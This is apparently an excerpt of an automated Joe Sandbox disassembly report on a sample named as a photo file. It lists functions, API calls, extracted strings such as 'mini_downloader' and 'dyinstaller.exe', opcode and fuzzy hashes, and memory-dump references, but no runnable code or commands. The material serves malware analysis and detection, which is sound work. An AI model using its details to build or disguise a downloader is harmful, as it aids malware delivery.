                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                • String ID:
                                                                • API String ID: 3470314060-0
                                                                • Opcode ID: 8dc76273e3b943d23cf5b7c912b774a5a5bc82802a68655e1fc91e2cb08c822f
                                                                • Instruction ID: 739c6336b113b250371589eb23bd778b8bf39228b591d0d5a0a8eef1b7f89c6c
                                                                • Opcode Fuzzy Hash: 8dc76273e3b943d23cf5b7c912b774a5a5bc82802a68655e1fc91e2cb08c822f
                                                                • Instruction Fuzzy Hash: F3016135904B22EBFB01FB649889B6D77A0FB007D0F15811AE444A7199CB34ED81CBA1
                                                                Function 004853A0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 186COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _swscanf$_memmove
                                                                • String ID: %lf$' is not a number.
                                                                • API String ID: 680132429-357672074
                                                                • Opcode ID: 43e8290cd3fdd9918755e5f7dfe745c7d0f17ce506d6e6805a00b5decdbda962
                                                                • Instruction ID: f7bafcd9ad520bafacc1bdbb8fa6dd04db4c0217368a2ca2bb0819214f6cf65f
                                                                • Opcode Fuzzy Hash: 43e8290cd3fdd9918755e5f7dfe745c7d0f17ce506d6e6805a00b5decdbda962
                                                                • Instruction Fuzzy Hash: B761A171D00658ABDB14EFE9C881AAEF7B9FF04700F14496EE415A7241EB786A04CB95
                                                                Function 00410956 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 154COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_
                                                                • String ID: %s\%s$%s_%s%s$dyinstaller.exe$info_version
                                                                • API String ID: 2427045233-86934078
                                                                • Opcode ID: e6322655c1502d49d1e3fb6c236ea99dc081433bc1d68c46dec716920b76b65a
                                                                • Instruction ID: fecca854535760254ea87edce7e1b1889f47263c1327e140b16c15e26831a2cf
                                                                • Opcode Fuzzy Hash: e6322655c1502d49d1e3fb6c236ea99dc081433bc1d68c46dec716920b76b65a
                                                                • Instruction Fuzzy Hash: 3E51B171900208DFCF10DFA4CD85ACAB7B6BF45308F1081AEE159A72A1DB74AE85CF64
                                                                Function 0045F6C0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 0045F71D
                                                                • CreateFileW.KERNEL32(?,80000000,00000000,0000000C,00000003,00000080,00000000,?), ref: 0045F7DE
                                                                • GetLastError.KERNEL32 ref: 0045F7F3
                                                                • _wcslen.LIBCMT ref: 0045F801
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$CreateErrorFileLast
                                                                • String ID: INVALID_HANDLE_VALUE
                                                                • API String ID: 1996474453-2198927851
                                                                • Opcode ID: dcdd94537381abc354b0d48ec030fae08d785375b070aa668124a9e9f6ee70c3
                                                                • Instruction ID: a5ce0cd69342158708ecf7d6b4a59346988c7fa0f03e5f7ed03e063fe3da3a12
                                                                • Opcode Fuzzy Hash: dcdd94537381abc354b0d48ec030fae08d785375b070aa668124a9e9f6ee70c3
                                                                • Instruction Fuzzy Hash: 38410B72A002048BDB10DF28DC447AAB3A6EB58315F1445BFEC19DB382D7789D4CCB96
                                                                Function 0041E0A8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetBkColor.GDI32(?,?), ref: 0041E0FF
                                                                • ExtTextOutW.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041E113
                                                                • CreateDIBSection.GDI32 ref: 0041E16B
                                                                • DeleteObject.GDI32(?), ref: 0041E1CE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ColorCreateDeleteObjectSectionText
                                                                • String ID: (
                                                                • API String ID: 2482505015-3887548279
                                                                • Opcode ID: db1ffe6db247fcca73a068802d2c52437967ff657e3fb2e8ed8016fbeebf39c6
                                                                • Instruction ID: 0014b74a250d986b521e3e1264c06b0ebc9be12bcf4b579205de22970cf54c8a
                                                                • Opcode Fuzzy Hash: db1ffe6db247fcca73a068802d2c52437967ff657e3fb2e8ed8016fbeebf39c6
                                                                • Instruction Fuzzy Hash: B4315CB1508350ABD7149F6A8C889ABFFE9FFC9750F00491EF59986260D3B1C845CBA6
                                                                Function 004560A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Exception@8Throw_wcslen
                                                                • String ID: ProtoValue::integer wrong type$core\ProtoValue.cpp$xJc
                                                                • API String ID: 2610429163-654076065
                                                                • Opcode ID: 613f0e2fbeda097b722b15ad614271513b4af45204b0331db1ad217cf76f304c
                                                                • Instruction ID: 3b9b58a8d51c1815a2f6e956c7b21c1dac79e31bc191819fe879930496949531
                                                                • Opcode Fuzzy Hash: 613f0e2fbeda097b722b15ad614271513b4af45204b0331db1ad217cf76f304c
                                                                • Instruction Fuzzy Hash: D7316C70E002089BCB14DFAAC8816EEFBB9FF44314F50856FE819A7281DB385A05CF59
                                                                Function 0043764E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 00437655
                                                                  • Part of subcall function 00443F97: _memset.LIBCMT ref: 00443FD7
                                                                  • Part of subcall function 0048A378: _malloc.LIBCMT ref: 0048A392
                                                                • _memset.LIBCMT ref: 004377D9
                                                                • _memset.LIBCMT ref: 004377EB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memset$H_prolog3_malloc
                                                                • String ID: hP`$xR`
                                                                • API String ID: 2317708371-326985
                                                                • Opcode ID: 7e86c2a1046c6c1233a92c865c1630a723308fd3bf3b264b56a41dac8ee1fc16
                                                                • Instruction ID: cc377cd1e1709a7bb1a76b5dcc1bef9a3c0f614e828469c54856656167d1838a
                                                                • Opcode Fuzzy Hash: 7e86c2a1046c6c1233a92c865c1630a723308fd3bf3b264b56a41dac8ee1fc16
                                                                • Instruction Fuzzy Hash: 1D416DB1744B82AAD728EF7984457C9FFA0BF06314F10871EA16D97281CBB426648BC6
                                                                Function 0040BABA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memmove$Xinvalid_argumentstd::_
                                                                • String ID: string too long
                                                                • API String ID: 1771113911-2556327735
                                                                • Opcode ID: 8daa0a67f8c69ac3fefd508ca52537ff5f565ff04cf2d6188361ee0de1575382
                                                                • Instruction ID: 9dfacc51ca7beafbe11fceaddb5c0d5fe7df2410fb324c97a1b08eb5d63af2dd
                                                                • Opcode Fuzzy Hash: 8daa0a67f8c69ac3fefd508ca52537ff5f565ff04cf2d6188361ee0de1575382
                                                                • Instruction Fuzzy Hash: 5B2151303106008BCA249E1CC99592AB7F6FB817147240A3FE492A7BD5D738FC4587ED
                                                                Function 004466C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$__strftime_l_memmove_vwprintf
                                                                • String ID: 1.0.2|mini_downloader
                                                                • API String ID: 1304513354-4221120243
                                                                • Opcode ID: fe9644e60fbc63760078ac2c9db89722232d605358661071f557fd18756208b1
                                                                • Instruction ID: b8077ce4dde638653c900d76d95d5cc729f5593421c1fa568991351f0f432e58
                                                                • Opcode Fuzzy Hash: fe9644e60fbc63760078ac2c9db89722232d605358661071f557fd18756208b1
                                                                • Instruction Fuzzy Hash: 5F2198B1A002446FDB14EF6ACC45A6BB7ECEF44314F044A2FF816D7391EB79A9048755
                                                                Function 00483860 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0048389D
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 004838BB
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 004839CC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Xinvalid_argumentstd::_
                                                                • String ID: invalid string position$string too long
                                                                • API String ID: 909987262-4289949731
                                                                • Opcode ID: 6f7df3518093106d2ddd664dd193ad65a45f131ac3388f86b97147aa820d9d0a
                                                                • Instruction ID: 847472a2e8f6d6a0519feb36328aba12260e8c292442a89f945487ca67d8a8db
                                                                • Opcode Fuzzy Hash: 6f7df3518093106d2ddd664dd193ad65a45f131ac3388f86b97147aa820d9d0a
                                                                • Instruction Fuzzy Hash: 871102713006185B8B14FE5DDAC082EB7A7AA81F157240E2BF56183280DA78EE4587AC
                                                                Function 0041054A Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00410551
                                                                  • Part of subcall function 004017BC: _wcslen.LIBCMT ref: 004017D5
                                                                  • Part of subcall function 004019E2: _memmove.LIBCMT ref: 004019FE
                                                                  • Part of subcall function 00455B40: _wcslen.LIBCMT ref: 00455C1E
                                                                  • Part of subcall function 00455B40: __CxxThrowException@8.LIBCMT ref: 00455D0C
                                                                  • Part of subcall function 00455B40: _wcslen.LIBCMT ref: 00455D21
                                                                  • Part of subcall function 00455B40: _wcslen.LIBCMT ref: 00455DBA
                                                                  • Part of subcall function 004560A0: _wcslen.LIBCMT ref: 004560FF
                                                                  • Part of subcall function 004560A0: __CxxThrowException@8.LIBCMT ref: 004561AA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$Exception@8Throw$H_prolog3__memmove
                                                                • String ID: complete$process$speed$total
                                                                • API String ID: 2942618997-3083368904
                                                                • Opcode ID: 458eb6324ba22a023efc46e02b6b1f5bdadcd3eb8d4bfcc130749b3364f4928a
                                                                • Instruction ID: bfd215d88a99b036ca318839b6ccbcd0cab1f35e3395d4f6aee9f5755942d292
                                                                • Opcode Fuzzy Hash: 458eb6324ba22a023efc46e02b6b1f5bdadcd3eb8d4bfcc130749b3364f4928a
                                                                • Instruction Fuzzy Hash: A4215630E016089BCF14EBB5C4657AEB7B2AF84309F51442EF9016B3D2CE38AD05CB94
                                                                Function 0041146D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsZoomed.USER32(?), ref: 0041148C
                                                                • MonitorFromWindow.USER32 ref: 004114B8
                                                                • GetMonitorInfoW.USER32(00000000), ref: 004114BF
                                                                • OffsetRect.USER32(00000002,?,?), ref: 004114F8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Monitor$FromInfoOffsetRectWindowZoomed
                                                                • String ID: (
                                                                • API String ID: 1941046686-3887548279
                                                                • Opcode ID: 13e89aa54962e8ba11b7501019934f5d249c3fcf0643de7e7e6b60c74b6a9213
                                                                • Instruction ID: 14e2f3aa2f1fc107a7783893817ceb5a05302232226ca7617baacf0efa996b32
                                                                • Opcode Fuzzy Hash: 13e89aa54962e8ba11b7501019934f5d249c3fcf0643de7e7e6b60c74b6a9213
                                                                • Instruction Fuzzy Hash: 8421E772608301AFC740DF68D985A5BBBF8FB88710F008D2EF99AC7250D770E9048B66
                                                                Function 0047FC80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InitializeCriticalSection.KERNEL32(00634D20,3D09168B,00000000,?,00000001,0059A91E,000000FF,?,0046C0E1,3D09168B,?,0059AA4E,000000FF), ref: 0047FD59
                                                                • _strlen.LIBCMT ref: 0047FD80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
